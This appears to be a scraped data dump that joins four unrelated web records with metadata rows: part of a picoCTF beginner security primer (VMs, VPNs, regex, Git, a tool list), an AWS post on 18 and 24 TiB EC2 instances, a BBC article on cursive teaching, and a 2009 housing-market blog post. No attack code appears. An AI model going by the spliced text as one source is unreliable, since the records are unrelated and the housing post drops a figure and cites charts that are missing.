Since hacking can sometimes be very dependent on the version of a target’s hardware or software, being able to practice on an exact copy is helpful. For the same reason, this is why downloading security updates for your software is a good idea! Cyber teams around the world work to 'patch' problems and publish fixes as quickly as they can.

Additionally, if you’re investigating potential malware, it’s a good idea to run it in a virtual machine to help protect your computer. Since the VM acts like an independent computer, most malware will be contained inside it. If you run into any issues, you can simply reset the virtual machine to a previous state.

To get started, you might be interested in VirtualBox, which allows for software virtualization to whatever your other tools or use cases need.

### B.3. VPNs

When accessing a remote server, you may need a Virtual Private Network, or VPN, to connect to it. This is a way to connect securely, as well as protect your privacy. In this arrangement, your data will be encrypted and sent to the VPN provider, who will then send it to a remote server, such as a website.
If a third party intercepts your data, they won’t be able to read it, and if they’re listening to your traffic, all they’ll see is the connection to the VPN, rather than where you go next. Pretty handy!

In industry, companies often require their employees to use a company VPN to access their internal network from outside the office. Just like how VPNs can protect an individual’s data, they can protect a company’s sensitive information too! Without a VPN, employees working remotely may be vulnerable to their credentials being stolen.

If you choose to use a VPN, it’s important to understand that you’re trusting the VPN provider with your data. If you’re working on a sensitive project, you may want to vet the VPN provider to ensure that they’re trustworthy.

### B.4. Authentication

Hackers need to worry about their own security too! When using virtual services, along with a VPN, use strong passwords and multi-factor authentication whenever possible. That way, even if an adversary were to steal your password from one service, they would still need the other factors in order to impersonate you.

If you pursue cybersecurity as a career, many people may be trusting you with their data. You should take this responsibility seriously, and protect your own accounts to avoid putting others at risk. Best practices change often, but current recommendations include using a password manager, and including a hardware token for authentication. When creating a password, consider using a passphrase instead, as these are generally easier to remember and harder to crack.

### B.5. IDEs

IDEs, or Integrated Development Environments, are tools that help developers write code. They often include features like syntax highlighting, code completion, and debugging. Visual Studio Code is a popular IDE that’s available for Windows, Mac, and Linux. Due to it being open source, many developers are able to contribute plugins to extend its functionality for specific languages or use cases.
An IDE can help hackers by making it easier to write code for scripts, read code from their targets, and by providing tools to help them understand what code is doing.

### B.6. Installations

If you’re interested in installing a distro of Linux on your computer or on a virtual machine, it’s generally a good idea to start with a popular distro so that there are plenty of resources and people that may be able to help you. A popular distro for beginners is Ubuntu, and another among hackers is Kali.

If you don’t want to install a distro, you can also use a live USB, which is a USB drive that you can boot from. This is a great way to try out a distro without installing it. Some, like Tails, are designed to use this feature to protect user privacy.

## Appendix C: Regular Expressions (Regex)

##### Jeffery John

Regular expressions, or regex, are a way to search for patterns in text. For example, you can use regular expressions to look for email addresses in a document, or even a flag for a capture-the-flag challenge. Several programming languages, including Python, have built-in support for regular expressions.

### C.1. Common Use Cases

You’ve likely used regex before. For example, `grep` and `find` are two Unix commands that use regular expressions to search for files and text. For more about them, see our forensics section here.

Some other common use cases for regular expressions include searching for:

- URLs
- Phone numbers
- Dates
- IP addresses
- Passwords

Regular expressions can also be used to validate, or check, a user’s input. For example, you may want to check that a user’s credit card number is in the correct format before allowing them to submit a form. This can also be useful for replacing or removing a string from a document. For example, you may want to remove all instances of a certain word, or perhaps prevent an attacker from submitting a form with malicious code.

### C.2. Basic Syntax

Regex can be difficult to understand at a glance, as it is meant for describing patterns, not just simple strings. A regex pattern is a sequence of characters that defines a search. The regex `xyz` would match the string 'xyz', but not 'xy' or 'xzy'. This can be expanded to include more complex patterns. For example, `x..` also matches 'xyz', but it matches 'xab' too; similarly, `x.*y.*z` matches 'xyz' as well as 'x123y456z'.

Much of our data is structured in a way that can be described by regular expressions. Email addresses often include the '@' symbol and a domain, and credit card numbers often follow rules based on their issuer. Even our picoCTF flags are often in the format picoCTF{}, which could be described by regex as `picoCTF\{.{1,15}\}`.

#### C.2.1. Literal & Meta characters

Literal characters are the simplest pattern. They are characters that must be present. Like in our earlier example, the regex `xyz` could only match the string 'xyz'.

Metacharacters have special rules. For example, the period `.` can match any character. The asterisk `*` can match zero or more of the character before it. Additionally, the plus `+` can match one or more of the character before it, and the question mark `?` can match zero or one of the character before it. These can be combined to create even more complex patterns. While they sound very similar, a single character can make a big difference in the information you can find!

#### C.2.2. Escaping Special Characters

Just like in many programming languages, you can use a backslash `\` to escape a special character. For example, if you want to match a period, you would use `\.`. This prevents the period from being treated as a metacharacter, which would lead to your regex matching any character, not just a period.

#### C.2.3. Character Classes

Character classes are a way to find a set. The regex `[xyz]` would match any one of the characters 'x', 'y', or 'z' - it does not need to match all of them.
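These rules are easy to experiment with using Python's built-in `re` module. A quick sketch with the patterns above (each `assert` passes silently when the pattern behaves as described):

```python
import re

# Literal characters: 'xyz' matches only that exact sequence.
assert re.search(r"xyz", "xyz")
assert not re.search(r"xyz", "xzy")

# '.' matches any single character; '*' means zero or more
# of the character before it.
assert re.fullmatch(r"x..", "xab")
assert re.fullmatch(r"x.*y.*z", "x123y456z")

# Escaping: '\.' matches a literal period instead of "any character".
assert re.fullmatch(r"3\.14", "3.14")
assert not re.fullmatch(r"3\.14", "3914")

# Character classes: [xyz] matches any one of 'x', 'y', or 'z'.
assert re.fullmatch(r"[xyz]", "y")

print("all patterns behaved as expected")
```

Trying small variations of these patterns against your own test strings is one of the fastest ways to build regex intuition.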
This can be expanded to include ranges, like `[a-z]` or `[0-9]`.

### C.3. Anchors

Anchors can match the start (`^`) or end (`$`) of a string. This can be helpful if you aren’t sure what the rest of the string looks like, but you know part of the pattern.

### C.4. Regex in Python

We covered Python in our earlier chapters, which includes built-in support for regular expressions. By importing the `re` module, you can create and test regex in your code. As an example:

```
import re

pattern = 'hello, *'
string = 'hello, world!'

match = re.search(pattern, string)

if match:
    print('Match found!')
else:
    print('No match found.')
```

This would print 'Match found!', as the pattern 'hello, *' matches the string 'hello, world!'. It would also return a match if the string included your name, like 'hello, reader!'.

Throughout this Primer, we’ll share examples from other coding languages as well. Regex is a very helpful tool, and so it is nice to be able to use it in many different environments, depending on what is available and your comfort level. You might see regex for helping with a database query, website, or even a CTF challenge!

## Appendix D: Git & Version Control

##### Jeffery John

As you progress through more and more cyber challenges, you may find yourself with quite the collection of files! You may also find that you want to try multiple approaches while solving a problem, or work with a team. Using version control, such as Git, can save you a lot of time and effort.

Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency.

https://git-scm.com

Version control is a way for developers to 'time-travel' by allowing them to save their files and return to them at any point. For example, you may start making changes to your Python code, and find that suddenly it doesn’t work anymore! Git would allow you to go back to a version of your code that does work.
When working with teams of programmers or hackers, version control allows you to compare differences, or 'diffs', of each file and then 'merge' your progress together. This way, multiple people can work on the same problem without undoing each other’s progress!

Along with Git, other Version Control Systems (VCS) include Subversion (SVN), Sapling, and Piper. Many large companies will develop or modify their VCS to fit their needs, though the basic principles remain the same. With tens of thousands of employees working on the same projects, some form of version control is a necessity for professionals to get work done. Another term for VCS is Source Configuration Management (SCM). These terms can be used interchangeably.

However, Git and GitHub are less similar. Git is a VCS or SCM, while GitHub is a web-based platform for development and collaboration that uses Git. We’ll talk more about GitHub later in this chapter.

You can get started with Git locally, on your computer, or remotely in the cloud, like with the picoCTF webshell.

### D.1. 'Git' Started with Git

To start using Git locally, make sure to download a copy for your operating system from their website. This has already been done for you in the picoCTF webshell, and can be verified by typing `git --version`.

`$ git --version`

Using a VCS takes some practice with the shell. If you feel a bit lost, you may want to touch up with our chapter on using one.

Once inside a shell with Git installed, you can start, or 'initialize', a repository with `git init`. This will start 'tracking' all the files in your current folder.

`$ git init`

A repository, often abbreviated as a 'repo', is a collection of files. Version control works by 'tracking' changes to these files, and letting you undo or merge changes whenever you want.

You can now tell Git who you are with `git config --global user.email "<your email>"` and `git config --global user.name "<your name>"`.
```
$ git config --global user.email "<your email>"
$ git config --global user.name "<your name>"
```

Many video games have 'save' or 'check' points, where you can return to a point in the level if you need to. In Git, 'commits' act in a very similar way. You can add, or 'stage', all the files in your current folder with `git add .`, then commit them to be saved with `git commit -m "<your description>"`.

```
$ git add .
$ git commit -m "<your description>"
```

Now, you can make any changes you want to the contents of your folder. You could add or delete files, or change lines of code. When you’re ready to go back in time, you can see your past commits with `git log`. By default, this will show the author, commit ID, time, and description.

The commit ID will be a long series of letters and numbers. This is based on a 'hash' of your files. We’ll talk more about hashing later in this Primer, with the cryptography chapter. By copying the commit ID, we can time travel back to that save point with `git checkout <commit ID>`. Pretty cool, right?

```
$ git log
$ git checkout <commit ID>
```

### D.2. Branching

You can also create multiple 'branches' of time with the `git branch <branch name>` command! You can see all local and remote branches with `git branch -a`, and switch between them with `git checkout <branch name>`.

```
$ git branch -a
$ git checkout <branch name>
```

When you start a repository, you’ll be on the `main` branch. This may also be called the `trunk` or `boss`. If you’re working on an older repository, you may see it referred to as `master`. You can rename your `main` branch to whatever you’d like, but make sure that any collaborators know about the change.

Creating multiple branches as you work is a very powerful way to keep track of what you’re working on. Each branch can have its own commit history. This can be especially useful for multiple people working together.
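Before we go further with branches, a quick aside on those commit IDs: Git derives object IDs by hashing content. As a sketch of the idea, here is how Git names a file's contents (a 'blob') in Python; classic Git uses SHA-1, and this helper is illustrative rather than Git's actual code:

```python
import hashlib

def git_blob_id(content: bytes) -> str:
    # Git hashes a small header ("blob <size>\0") followed by the raw bytes.
    header = b"blob %d\x00" % len(content)
    return hashlib.sha1(header + content).hexdigest()

one = git_blob_id(b"hello world\n")
two = git_blob_id(b"hello world!\n")

print(one)  # a 40-character hex ID, always the same for identical content
assert one == git_blob_id(b"hello world\n")  # deterministic
assert one != two                            # any change gives a new ID
```

This is why a commit ID changes whenever any tracked content changes: the ID is a fingerprint of the data itself, not a counter.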
It’s a good habit for each person to have their own branch, and for each new feature or problem to be worked on in its own branch. When ready, a branch can be 'merged', or combined, with the branch you currently have checked out, using the `git merge <branch name>` command.

`$ git merge <branch name>`

Above is an example of a branching structure. Each commit is numbered with a prefix 'C', and a branch has been created to work on a feature. 'C4' is a snapshot, or check point, of the most progress on the master, or main, branch. 'C5', with commit ID "iss53", is a snapshot of the most progress done for the feature.

Note how 'C5' contains 'C0', 'C1', 'C2', and 'C3', while 'C4' only contains 'C0', 'C1', and 'C2'. When merging 'C5' into the main branch at 'C2', the commit history of 'C5' will be merged as well. If `git log` were to be run afterward, it would show a path from commit 'C4' to 'C5' to 'C3' to 'C2' to 'C1' and finally to the initial commit 'C0'.

Time travel can be tricky! But by keeping careful track of commits and their common ancestors, we can branch and merge with confidence.

### D.3. Merging

If you’re working with a 'remote' repository, such as one on GitHub, you can 'pull' or 'fetch' changes from the remote repository with `git pull`. This will download any changes from the remote repository and merge them with your current branch. This is known as 'fast-forwarding', because the changes are simply added to the end of your branch’s commit history.

It’s important to do this regularly to avoid merge conflicts later! A merge conflict is when two branches have changes on the same line. This can happen when you’re working on your local machine or personal branch, and changes are made to the original file before you merge back in. Fetching the latest changes helps ensure that any differences are minimal. Ideally, conflicts can also be avoided by working on different files or different lines of code on each branch.
However, if you do run into a merge conflict, Git will show you the difference between the file on each branch and ask what you’d like to keep. You can then use a text editor to delete the other change, or splice the changes together.

The start of the conflict is marked with `<<<<<<< HEAD`, and the end of the conflict is marked with `>>>>>>> <branch name>`. Somewhere in the middle will be a `=======`, which marks the division between the lines in each branch. It’ll be up to you to decide what to keep and what to delete. The markers from Git are just there to help you find the conflict, and can be deleted once you’re done.

For example, if you had a file with the following contents:

```
$ cat example.txt
This is a file to demonstrate merging.
```

And were working on two separate branches, one with the following changes:

```
$ git checkout cats
$ cat example.txt
Cats are very cute.
```

And another with the following changes:

```
$ git checkout dogs
$ cat example.txt
Dogs are very cute.
```

If you try to merge the two branches together, you’d get the following error:

```
$ git merge cats
Auto-merging example.txt
CONFLICT (content): Merge conflict in example.txt
Automatic merge failed; fix conflicts and then commit the result.
```

This can be a scary message! But if you open the file, you’ll see the following:

```
$ cat example.txt
This is a file to demonstrate merging.
<<<<<<< HEAD
Dogs are very cute.
=======
Cats are very cute.
>>>>>>> cats
```

The first line is the original file. The line between `<<<<<<< HEAD` and `=======` is the change from the `dogs` branch (the branch currently checked out), and the line between `=======` and `>>>>>>> cats` is the change from the `cats` branch. To resolve this conflict, we’ll need to decide how to avoid example.txt having two different lines in the same place. We could delete one of the lines, or combine them together. For example, we could change the file to the following:

```
$ cat example.txt
This is a file to demonstrate merging.
Dogs and cats are very cute.
```

Once you’ve chosen the changes that will continue through the merge, you can add and commit the file like normal, or use `git merge --continue`. You can also abort the merge with `git merge --abort` if you’d like to start over. One more useful tool is `git stash`, which will save your current changes and allow you to return to them later with `git stash pop`.

Afterward, your original branch will be updated with the changes from the other, merged branch. Great job!

### D.4. Pulling & Pushing

After finishing your changes and pulling and merging with the main branch, you can 'push' your changes to be used by others, or yourself on a different device. If you’re working on a cloned copy, you can use `git push` to send your commits to their source, the remote repository.

If you’re working with files you’ve created locally, you’ll need to create a remote repository to push to. This can be done with `git remote add origin <remote repository URL>`. You can then push your changes to the remote repository with `git push -u origin <branch name>`.

```
$ git push
$ git remote add origin <remote repository URL>
$ git push -u origin <branch name>
```

GitHub is a good tool to get comfortable with collaboration. 'Pull requests' are a way for maintainers of a project to review your work, and can help catch any errors that slipped past what merge conflicts can catch. Sometimes, automated tests are run on the code as well to make sure it’s ready to go into production!

As a hacker, you’ll want to work closely with your team to make sure everyone is using updated code, scripts, and programs as modifications are made to solve challenges. Be careful of forcing changes with the `-f` flag, as this can overwrite any work that’s already been completed.

### D.5. Review of Git

| Operation | Shell example | Note |
|---|---|---|
| See Git options | `git help` | Lists all the available commands and options for Git. |
| Start a repository | `git init` | 'Initialize' your current folder into a 'repository' where files and file changes can be tracked. |
| Stage a file | `git add <file>` | 'Staging' a file means it will be added to your next commit. |
| Commit file(s) | `git commit -m "<your description>"` | 'Commit' your files to be saved. It’s a good habit to write short, helpful commit messages so that you and others can find your work easily later. |
| See past commits | `git log` | See past 'save points' and their commit IDs so you can go back to them. |
| Go to a past commit | `git checkout <commit ID>` | Return the repository to a past commit. |
| Combine commits together | `git merge <branch name>` | Combine the work on different branches together. Be careful of merge conflicts! You’ll be prompted to choose which work should be brought forward. |
| Create a new branch | `git branch <branch name>` | Create a new 'branch' of time. This new branch will start with the commit history of its parent branch, but once checked out, future commits will stay on that branch until merged. |
| Go to a new branch | `git checkout <branch name>` | Like checking out a commit, this will return or forward your repository to the contents of the branch. Time travel! |
| Pull a repository | `git pull` | Create or update a copy of a repository in your development environment. |
| Push a repository | `git push` | Send your updates back to the remote repository so that you and/or others can access them. If your local branch has no remote equivalent, you’ll be asked to specify where your commits should be sent. |

If you want more practice, I (Jeffery) recommend *Oh My Git!*, an open source game with interactive visualizations and commands.

### D.6. Using GitHub

GitHub has many features on top of Git to help when writing code and working with files. For example, while it’s important to be comfortable with the shell when working with Git and when hacking, GitHub provides a Desktop client that can be a convenient GUI for common workflows. They also have a mobile app, cloud dev environments, and automated security scans.
As a student, a great place to start is the GitHub Student Developer Pack, which offers many free resources and further tutorials.

As a collaboration tool, GitHub allows you to create public 'open source' repositories and join discussions or contribute code to others. You can even find the code for picoCTF and add to this primer! https://github.com/picoCTF

Many open source repositories will include a CONTRIBUTING.md file that discusses what help they’re looking for. More discussion and best practices for the open source community can be found at https://opensource.guide

Just make sure, as a hacker and competitor, that you’re allowed to publish what you’re working on to a public repository! Many competitions, including picoCTF, ask that files related to the competition are kept secret for some time in order to ensure fairness. Check public repositories for licenses as well, which will detail how their code can be used.

We hope you join our community!

## Appendix E: Tools

##### Jeffery John

Throughout this Primer, we’ve recommended a number of tools to help you get started with hacking. Here they are, all in one place!

### E.1. General

- picoCTF Webshell: https://webshell.picoctf.org
- Git: https://git-scm.com

### E.2. Forensics

- The Sleuth Kit: https://www.sleuthkit.org/sleuthkit
- Wireshark: https://www.wireshark.org
- ASCII Table: https://www.asciitable.com
- Pwntools: http://docs.pwntools.com/en/stable

### E.3. Web Exploitation

- W3 Schools: https://www.w3schools.com
- Burp Suite: https://portswigger.net/burp

### E.4. Cryptography

- Vigenère Cracking Tool: https://www.simonsingh.net/The_Black_Chamber/vigenere_cracking_tool.html
- Extended Euclidean algorithm: https://planetcalc.com/3298
- Integer factorization calculator: https://www.alpertron.com.ar/ECM.HTM

### E.5. Databases

### E.6. Assembly

### E.7. Git

- Git: https://git-scm.com
- Git Cheat Sheet: https://education.github.com/git-cheat-sheet-education.pdf
- Oh My Git!: https://ohmygit.org
- GitHub: https://github.com
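As a quick illustration of one of the cryptography tools listed above, here is a minimal sketch of the extended Euclidean algorithm in Python (the same computation the linked calculator performs); it is a standard textbook implementation, not code from the linked site:

```python
def egcd(a, b):
    """Extended Euclidean algorithm: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return (a, 1, 0)
    g, x, y = egcd(b, a % b)
    # b*x + (a % b)*y == g; rewrite a % b as a - (a // b) * b to express g in terms of a and b.
    return (g, y, x - (a // b) * y)

# Example: the modular inverse of 7 mod 26, as needed when breaking affine ciphers.
g, x, _ = egcd(7, 26)
print(g, x % 26)  # prints: 1 15  (since 7 * 15 = 105 = 4*26 + 1)
```

Because gcd(7, 26) = 1, the coefficient `x` reduced mod 26 is the multiplicative inverse of 7, which is exactly what the extended algorithm gives you beyond a plain gcd.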
true
true
true
null
2024-10-12 00:00:00
2024-07-25 00:00:00
null
null
null
null
null
null
21,193,421
https://aws.amazon.com/blogs/aws/ec2-high-memory-update-new-18-tb-and-24-tb-instances/
EC2 High Memory Update – New 18 TB and 24 TB Instances | Amazon Web Services
null
## AWS News Blog

# EC2 High Memory Update – New 18 TB and 24 TB Instances

Last year we launched EC2 High Memory Instances with 6, 9, and 12 TiB of memory. Our customers use these instances to run large-scale SAP HANA installations, while also taking advantage of AWS services such as Amazon Elastic Block Store (Amazon EBS), Amazon Simple Storage Service (Amazon S3), AWS Identity and Access Management (IAM), Amazon CloudWatch, and AWS Config. Customers appreciate that these instances use the same AMIs and management tools as their other EC2 instances, and use them to build production systems that provide enterprise-grade data protection and business continuity. These are bare metal instances that can be run in a Virtual Private Cloud (VPC), and are EBS-Optimized by default.

Today we are launching instances with 18 TiB and 24 TiB of memory. These are 8-socket instances powered by 2nd generation Intel® Xeon® Scalable (Cascade Lake) processors running at 2.7 GHz, and are available today in the US East (N. Virginia) Region, with more to come. Just like the existing 6, 9, and 12 TiB bare metal instances, the 18 and 24 TiB instances are available in Dedicated Host form with a Three Year Reservation. You also have the option to upgrade a reservation for a smaller size to one of the new sizes.

Here are the specs:

| Instance Name | Memory | Logical Processors | Dedicated EBS Bandwidth | Network Bandwidth | SAP Workload Certifications |
| --- | --- | --- | --- | --- | --- |
| u-6tb1.metal | 6 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP |
| u-9tb1.metal | 9 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP |
| u-12tb1.metal | 12 TiB | 448 | 14 Gbps | 25 Gbps | OLAP, OLTP |
| u-18tb1.metal | 18 TiB | 448 | 28 Gbps | 100 Gbps | OLAP, OLTP |
| u-24tb1.metal | 24 TiB | 448 | 28 Gbps | 100 Gbps | OLTP |

SAP OLAP workloads include SAP BW/4HANA, BW on HANA (BWoH), and Datamart. SAP OLTP workloads include S/4HANA and Suite on HANA (SoH). Consult the SAP Hardware Directory for more information on the workload certifications.
With 28 Gbps of dedicated EBS bandwidth, the **u-18tb1.metal** and **u-24tb1.metal** instances can load data into memory at very high speed. For example, my colleagues loaded 9 TB of data in just 45 minutes, an effective rate of 3.4 gigabytes per second (GBps):

Here’s an overview of the scale-up and scale-out options that are possible when using these new instances to run SAP HANA:

**New Instances in Action**

My colleagues were kind enough to supply me with some screen shots from 18 TiB and 24 TiB High Memory instances. Here’s the output from the `lscpu` and `free` commands on an 18 TiB instance:

Here’s `top` on the same instance:

And here is HANA Studio on a 24 TiB instance:

**Available Now**

As I mentioned earlier, the new instance sizes are available today.

— Jeff;

PS – Be sure to check out the AWS Quick Start for SAP HANA and the AWS Quick Start for S/4HANA.
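As a quick sanity check on the quoted figure (this is just back-of-the-envelope arithmetic on the numbers from the post, reading the 9 TB as 9 TiB):

```python
# 9 TiB loaded in 45 minutes -> effective throughput in GiB/s.
data_gib = 9 * 1024   # 9 TiB expressed in GiB
seconds = 45 * 60     # 45 minutes in seconds
rate = data_gib / seconds
print(f"{rate:.1f} GiB/s")  # prints: 3.4 GiB/s, matching the ~3.4 GBps in the post
```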
true
true
true
Last year we launched EC2 High Memory Instances with 6, 9, and 12 TiB of memory. Our customers use these instances to run large-scale SAP HANA installations, while also taking advantage of AWS services such as Amazon Elastic Block Store (Amazon EBS), Amazon Simple Storage Service (Amazon S3), AWS Identity and Access Management (IAM), Amazon […]
2024-10-12 00:00:00
2019-10-08 00:00:00
https://d2908q01vomqb2.c…ap_options_4.png
article
amazon.com
Amazon Web Services
null
null
2,042,410
http://blog.yafla.com/The_Biggest_Lie_That_Ever_Was_Told/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,155,594
https://www.bbc.com/future/article/20240122-california-signs-cursive-writing-into-law-what-are-the-brain-benefits
California signs cursive writing into law – what are the brain benefits?
Nafeesah Allen
# California signs cursive writing into law – what are the brain benefits?

**From the start of 2024, the state of California reinstated the requirement that first through sixth graders in public schools learn to write in cursive.**

The handwriting technique stopped being taught in the Golden State in 2010, but now California re-joins nearly two dozen US states that have made cursive education mandatory in some form. While cursive – also known as joined italics – was momentarily thought of as a dying art in the US, the move by California has reignited debates in both educational and scientific circles about the real value of learning this writing style, the global implications of letting it go and questions about its potential brain benefits.

California-based neuroscientist Claudia Aguirre says "more and more neuroscience research is supporting the idea that writing out letters in cursive, especially in comparison to typewriting, can activate specific neural pathways that facilitate and optimise overall learning and language development." Kelsey Voltz-Poremba, assistant professor of occupational therapy at the University of Pittsburgh, adds that young children may even find cursive easier to learn and replicate. "When handwriting is more autonomous for a child, it allows them to put more cognitive energy towards more advanced visual-motor skills and have better learning outcomes," she says.

**So why isn't everyone on the cursive bandwagon?**

There are a lot of reasons why cursive hasn't been mandated by all schools. While the benefits of manual handwriting are clear, the literature differs on whether cursive specifically is better than print for child development. Karin James, professor of psychological and brain sciences at Indiana University, works with four-to-six-year-olds in her research, which focuses on print over cursive.
Her research found that learning letters through writing by hand activates networks in the brain that are not activated by typing on a keyboard, including an area known to play a role in reading. Other research by Virginia Berninger, a professor in educational psychology at the University of Washington, has also shown that cursive, print writing and typing use related but different brain functions. Yet, cursive instruction for very young pupils is becoming more rare. Also, cursive instruction in the US isn’t standardised across all school districts or even across instructors. The inconsistency presents a unique challenge for teachers. "Nearly two dozen states have added a requirement for cursive handwriting instruction for grades three to five into their state educational standards," says Kathleen S. Wright, the founder and executive director of The Handwriting Collaborative, an educational organization that teaches best-practice approaches to classroom handwriting instruction. "However, this is not a requirement that is enforced or funded, so instruction in all forms of handwriting is not consistently addressed." California's teachers will have to figure out how best to integrate cursive into classrooms that didn't previously require it, but any pivot away from screens could be beneficial. "In our community-based handwriting program for school-aged youth at the University of Pittsburgh, we consistently have parents complaining their child is struggling in school and that they haven't been taught how to write because they mostly use their computer or [a] similar device," says Voltz-Poremba. The movements needed for typing are the same no matter what letter is being typed, she says, so children are robbed of the chance to develop sensory processing skills that come from forming and understanding letters. 
Perhaps the boomerang is turning back in the other direction simply because of the time we live in: post-pandemic, many children use a laptop or tablet for schoolwork, but a return to in-person classes shows that many US students display an over-reliance on screens.

**Are American children going to be left behind?**

Although the link between penmanship and reading achievement is not necessarily causal, some educators fear that letting go of cursive could spell a US backslide in educational outcomes. One small study by Italian researchers found that teaching cursive to pupils in the first year of primary school could improve their reading skills. Canada also tried to do away with cursive, only to resurrect it in 2023. Last year, the Ontario Ministry of Education reinstated its cursive handwriting instruction requirement. Educators remain curious about any lessons Ontario has learned about how best to give that instruction, how long lessons should last and how frequently practice should be introduced. Comparing the Organisation for Economic Co-operation and Development (OECD) Programme for International Student Assessment (PISA)’s 2022 global rankings for reading achievement of 15 year olds by country, the US was ninth. American students trailed behind Science, Technology, Engineering, and Math (STEM) powerhouses such as Singapore, which was in the top spot, and Japan at number three. Cursive writing is still widely taught in Western Europe. Spain, Italy, Portugal, and France have held onto the tradition. And in the UK, joined-up handwriting is still taught in English classrooms. The UK government’s Ofsted research review states that "the national curriculum requires children to learn unjoined handwriting before they 'start using some of the diagonal and horizontal strokes that are needed to join letters'". Meanwhile, Switzerland only teaches basic script and, in 2016, Finland removed cursive handwriting from its schools too.
With no global precedent one way or the other, school districts and ministries of education around the world vary widely from region to region.

**Is cursive worth losing?**

For all the unknowns, the evidence suggests that there is no downside to learning cursive. Research into the differences between handwriting vs. typing shows that it is still beneficial to write with pen and paper – but the greatest benefits (to memory and learning words, for example) are tied to the act of writing itself, not cursive over print. The only possible drawback is in perception. Handwriting is all too often pitted against keyboarding as a zero-sum game, which is not a fair proposition. Much like the debate over how much time kids need at recess, educators don't have to completely discontinue one learning activity in favour of an equally important one. Instead, Voltz-Poremba expounds a glass-half-full approach. "It's important to find a balance to ensure today's youth are prepared with the skills that are gained without the use of technology," she says.
true
true
true
A new law requiring cursive to be taught in California schools went into effect at the start of this year. But does this style of handwriting have long to live on a global scale?
2024-10-12 00:00:00
2024-01-22 00:00:00
https://ychef.files.bbci…351/p0h5lfnf.jpg
newsarticle
bbc.com
BBC
null
null
30,896,721
https://tribunemag.co.uk/2019/01/abolish-silicon-valley
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
8,705,257
http://online.wsj.com/articles/what-could-be-lost-as-einsteins-papers-go-online-1417790386
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
7,336,057
http://phys.org/news/2014-03-photon-enables-quantum-mechanical-state.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
703,160
http://globaleconomicanalysis.blogspot.com/2009/07/housing-update-how-far-to-bottom.html
Housing Update - How Far To The Bottom?
null
### Housing Update - How Far To The Bottom?

Inquiring minds have been asking for another housing update. Using the Japan Nationwide Land Prices model as my guide, here is how I have called things in real time.

My previous update was on December 1, 2008 in a post with the same name as this one: Housing Update - How Far To The Bottom? I just added the Summer 2009 arrow. Housing prices are now one notch closer to their final destination. The US Timeline scale is compressed. At the current pace, housing will take about years total to bottom vs. 14 years in Japan.

Comparison to Case-Shiller

Inquiring minds may wish to compare the shape of the above chart to the June 2009 Case-Shiller Release (April Data).

The chart above shows the index levels for the 10-City and 20-City Composite Indices. As of April 2009, average home prices across the United States are at similar levels to where they were in the middle of 2003. From the peak in the second quarter of 2006, the 10-City Composite is down 33.6% and the 20-City Composite is down 32.6%.

The chart above depicts the annual returns of the 10-City Composite and the 20-City Composite Home Price Indices. The 10-City and 20-City Composites declined 18.0% and 18.1%, respectively, in April compared to the same month in 2008. These are improvements over their returns reported for March, down 18.7% for both indices. For the past three months, the 10-City and 20-City Composites have recorded an improvement in annual returns. Record annual declines were reported for both indices with their respective January data, -19.4% for the 10-City Composite and -19.0% for the 20-City Composite.

“The pace of decline in residential real estate slowed in April,” says David M. Blitzer, Chairman of the Index Committee at Standard & Poor’s.
“In addition to the 10-City and 20-City Composites, 13 of the 20 metro areas also saw improvement in their annual return compared to that of March. Furthermore, every metro area, except for Charlotte, recorded an improvement in monthly returns over March. While one month’s data cannot determine if a turnaround has begun; it seems that some stabilization may be appearing in some of the regions. We are entering the seasonally strong period in the housing market, so it will take some time to determine if a recovery is really here.”

Flashback March 26, 2005

The initial data point was established in the post It's a Totally New Paradigm on March 26, 2005. Here are some excerpts from that post.

- Ron Shuffield, president of Esslinger-Wooten-Maxwell Realtors says that "South Florida is working off of a totally new economic model than any of us have ever experienced in the past." He predicts that a limited supply of land coupled with demand from baby boomers and foreigners will prolong the boom indefinitely.
- "I just don't think we have what it takes to prick the bubble," said Diane C. Swonk, chief economist at Mesirow Financial in Chicago, who was an optimist during the 90's. "I don't think prices are going to fall, and I don't think they're even going to be flat."
- Gregory J. Heym, the chief economist at Brown Harris Stevens, is not sold on the inevitability of a downturn. He bases his confidence in the market on things like continuing low mortgage rates, high Wall Street bonuses and the tax benefits of home ownership. "It is a new paradigm" he said.

Inquiring minds may wish to review Bernanke: There's No Housing Bubble to Go Bust.

> Ben S. Bernanke does not think the national housing boom is a bubble that is about to burst, he indicated to Congress last week, just a few days before President Bush nominated him to become the next chairman of the Federal Reserve. U.S. house prices have risen by nearly 25 percent over the past two years, noted Bernanke, currently chairman of the president's Council of Economic Advisers, in testimony to Congress's Joint Economic Committee. But these increases, he said, "largely reflect strong economic fundamentals," such as strong growth in jobs, incomes and the number of new households.

Flashback February 12, 2008

Bernanke Expects Housing Recovery by Year End

> Federal Reserve Chairman Ben Bernanke told lawmakers Tuesday he expects the downtrodden U.S. housing sector to improve by the end of the year, a senator who participated in the closed-door meeting said. "He let us believe that the housing situation should begin to ameliorate by the end of the year," said Sen. Pete Domenici, a New Mexico Republican, told reporters. "He gave a very good, succinct, short overview of where he thought the economy was right now and how it might move forward," said Sen. Jon Kyl of Arizona.

Here are my thoughts from October 24, 2007 in Housing - The Worst Is Yet To Come.

> Subprime resets peak this year but Alt-A problems which are just as big do not peak until 2011. In addition, the overall economy is slowing dramatically. There is going to be a consumer led recession to deal with. Unemployment has bottomed this cycle and is bound to rise dramatically. That will further pressure housing prices in a very significant way. The worst (by a long shot) is yet to come. Remind me to start looking for a true bottom in 2011-2012. Perhaps we get a bounce somewhere along the way.

Please consider When Will Housing Bottom? for additional charts and details.

Housing Decline Fat Tails

The Case-Shiller charts suggest that the worst may finally be over. However, so far all we can say is that things are getting worse at a decreasing pace. This is not the same as getting better. Indeed it may take 2 years or more to cross the zero-line in the second Case-Shiller chart. That would be consistent with a bottom in 2011.
